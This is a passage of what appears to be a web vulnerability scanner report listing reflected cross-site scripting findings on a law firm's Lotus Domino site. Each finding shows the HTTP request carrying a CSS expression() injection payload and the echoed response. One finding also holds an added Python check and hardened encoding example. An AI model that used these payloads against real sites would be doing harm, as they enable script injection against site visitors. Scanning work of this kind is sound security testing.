Path:   /web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a893"style%3d"x%3aexpression(alert(1))"7e08a33da53 was submitted in the REST URL parameter 3. This input was echoed as 7a893"style="x:expression(alert(1))"7e08a33da53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/80868dabe98107a18525708000086fe17a893"style%3d"x%3aexpression(alert(1))"7e08a33da53/$NavImagemap/0.52?OpenElement&FieldElemFormat=gif HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:22:01 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9368
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - 80868dabe98107a18525708000086fe17a893"style="x:expression(alert(1))"7e08a33da53/$NavImagemap/0.52">
...[SNIP]...

4.127. http://www.butlerrubin.com/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31990"%3b533bbbd2843 was submitted in the REST URL parameter 5. This input was echoed as 31990";533bbbd2843 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.5231990"%3b533bbbd2843?OpenElement&FieldElemFormat=gif HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:22:04 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9274
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<!--
document._domino_target = "_self";
function _doClick(v, o, t) {
var url="/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.5231990";533bbbd2843?OpenElement&FieldElemFormat=gif&Click=" + v;
if (o.href != null)
o.href = url;
else {
if (t == null)
t = document._domino_target;
window.open(url, t);
}

}
// -->
...[SNIP]...

4.128. http://www.butlerrubin.com/web/br.nsf/index [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/index

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf370"style%3d"x%3aexpression(alert(1))"4fa2751b636 was submitted in the REST URL parameter 3. This input was echoed as bf370"style="x:expression(alert(1))"4fa2751b636 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers. The underlying defect, an unencoded double quote that closes the href attribute, is browser-independent: the same injection point accepts any other attribute, including an event handler.
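As an added example (not the scanner's code and not the site's), a small reflection check that reproduces the reasoning behind the "Certain" rating above: find the text echoed between the two random delimiters, confirm that the reflection point sits inside a double-quoted attribute value, and confirm that the echoed text still contains an unencoded double quote. The response line and the delimiters `bf370` / `4fa2751b636` are taken from the report; the `render_error_link` function is an assumed hardened rendering of that same link, not Domino's, using percent-encoding for the mailto subject and quote-aware HTML attribute encoding on top.

```python
import html
import re
from urllib.parse import quote

# Response fragment from the report (the only line of the 404 page that
# matters here), used here as constructed test input.
ECHOED = ('<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - '
          "HTTP Web Server: Couldn't find design note - "
          'indexbf370"style="x:expression(alert(1))"4fa2751b636">')

PREFIX, SUFFIX = "bf370", "4fa2751b636"   # random delimiters around the probe


def reflected_value(body: str, prefix: str, suffix: str):
    """Return the text echoed between the two delimiters, or None."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), body, re.S)
    return m.group(1) if m else None


def in_double_quoted_attribute(body: str, prefix: str) -> bool:
    """True if the reflection point lies inside a "..." attribute value:
    we are inside a tag (a '<' after the last '>'), and an odd number of
    double quotes precede the reflection within that tag."""
    pos = body.find(prefix)
    if pos < 0:
        return False
    tag_start = body.rfind("<", 0, pos)
    if tag_start < 0 or body.rfind(">", 0, pos) > tag_start:
        return False          # not inside a tag at all
    return body.count('"', tag_start, pos) % 2 == 1


def attribute_breakout(body: str, prefix: str, suffix: str) -> bool:
    """The condition the report describes for this context: the echoed value
    still carries an unencoded double quote while sitting inside a
    double-quoted attribute, so it can close that attribute."""
    echoed = reflected_value(body, prefix, suffix)
    return (echoed is not None and '"' in echoed
            and in_double_quoted_attribute(body, prefix))


def render_error_link(design_note: str) -> str:
    """Assumed hardened rendering of the error link.

    The subject is a URL component, so it is percent-encoded first (which
    already turns '"' into %22); html.escape(quote=True) then encodes any
    remaining attribute-significant character for the HTML context."""
    subject = ("Error on ButlerRubin.com - HTTP Web Server: "
               "Couldn't find design note - " + design_note)
    href = "mailto:jhurtado@butlerrubin.com?subject=" + quote(subject, safe="")
    return f'<a href="{html.escape(href, quote=True)}">'


if __name__ == "__main__":
    print("as echoed:", attribute_breakout(ECHOED, PREFIX, SUFFIX))
    safe = render_error_link('indexbf370"style="x:expression(alert(1))"4fa2751b636')
    print("hardened :", attribute_breakout(safe, PREFIX, SUFFIX))
```

The check is deliberately context-aware: a double quote echoed into text content between tags is not an attribute breakout, which is why `in_double_quoted_attribute` looks at the enclosing tag rather than just searching for the quote.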

Request

GET /web/br.nsf/indexbf370"style%3d"x%3aexpression(alert(1))"4fa2751b636?openform HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:30 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9278
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - indexbf370"style="x:expression(alert(1))"4fa2751b636">
...[SNIP]...

4.129. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_01ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64fac"style%3d"x%3aexpression(alert(1))"7790debee61 was submitted in the REST URL parameter 3. This input was echoed as 64fac"style="x:expression(alert(1))"7790debee61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /web/br.nsf/web64fac"style%3d"x%3aexpression(alert(1))"7790debee61/br.nsf/home_btn_01ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:39 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web64fac"style="x:expression(alert(1))"7790debee61/br.nsf/home_btn_01ov.jpg">
...[SNIP]...

4.130. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_01ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26672"style%3d"x%3aexpression(alert(1))"fe0666a8b66 was submitted in the REST URL parameter 4. This input was echoed as 26672"style="x:expression(alert(1))"fe0666a8b66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf26672"style%3d"x%3aexpression(alert(1))"fe0666a8b66/home_btn_01ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf26672"style="x:expression(alert(1))"fe0666a8b66/home_btn_01ov.jpg">
...[SNIP]...

4.131. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_01ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f2da"style%3d"x%3aexpression(alert(1))"0fe406f8278 was submitted in the REST URL parameter 5. This input was echoed as 4f2da"style="x:expression(alert(1))"0fe406f8278 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_01ov.jpg4f2da"style%3d"x%3aexpression(alert(1))"0fe406f8278 HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_01ov.jpg4f2da"style="x:expression(alert(1))"0fe406f8278">
...[SNIP]...

4.132. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_02ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc8e"style%3d"x%3aexpression(alert(1))"ace1f519915 was submitted in the REST URL parameter 3. This input was echoed as acc8e"style="x:expression(alert(1))"ace1f519915 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /web/br.nsf/webacc8e"style%3d"x%3aexpression(alert(1))"ace1f519915/br.nsf/home_btn_02ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:39 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - webacc8e"style="x:expression(alert(1))"ace1f519915/br.nsf/home_btn_02ov.jpg">
...[SNIP]...

4.133. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_02ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66197"style%3d"x%3aexpression(alert(1))"8bf47abd841 was submitted in the REST URL parameter 4. This input was echoed as 66197"style="x:expression(alert(1))"8bf47abd841 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf66197"style%3d"x%3aexpression(alert(1))"8bf47abd841/home_btn_02ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf66197"style="x:expression(alert(1))"8bf47abd841/home_btn_02ov.jpg">
...[SNIP]...

4.134. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_02ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7644"style%3d"x%3aexpression(alert(1))"ce851a25267 was submitted in the REST URL parameter 5. This input was echoed as f7644"style="x:expression(alert(1))"ce851a25267 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_02ov.jpgf7644"style%3d"x%3aexpression(alert(1))"ce851a25267 HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_02ov.jpgf7644"style="x:expression(alert(1))"ce851a25267">
...[SNIP]...

4.135. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_03ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1716"style%3d"x%3aexpression(alert(1))"4084a5490db was submitted in the REST URL parameter 3. This input was echoed as e1716"style="x:expression(alert(1))"4084a5490db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /web/br.nsf/webe1716"style%3d"x%3aexpression(alert(1))"4084a5490db/br.nsf/home_btn_03ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - webe1716"style="x:expression(alert(1))"4084a5490db/br.nsf/home_btn_03ov.jpg">
...[SNIP]...

4.136. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_03ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba47c"style%3d"x%3aexpression(alert(1))"c28d4b74f4a was submitted in the REST URL parameter 4. This input was echoed as ba47c"style="x:expression(alert(1))"c28d4b74f4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsfba47c"style%3d"x%3aexpression(alert(1))"c28d4b74f4a/home_btn_03ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsfba47c"style="x:expression(alert(1))"c28d4b74f4a/home_btn_03ov.jpg">
...[SNIP]...

4.137. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_03ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a767"style%3d"x%3aexpression(alert(1))"548deb48dd4 was submitted in the REST URL parameter 5. This input was echoed as 3a767"style="x:expression(alert(1))"548deb48dd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_03ov.jpg3a767"style%3d"x%3aexpression(alert(1))"548deb48dd4 HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:42 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_03ov.jpg3a767"style="x:expression(alert(1))"548deb48dd4">
...[SNIP]...

4.138. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_04ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52af3"style%3d"x%3aexpression(alert(1))"cdf88022cf4 was submitted in the REST URL parameter 3. This input was echoed as 52af3"style="x:expression(alert(1))"cdf88022cf4 in the application's response.

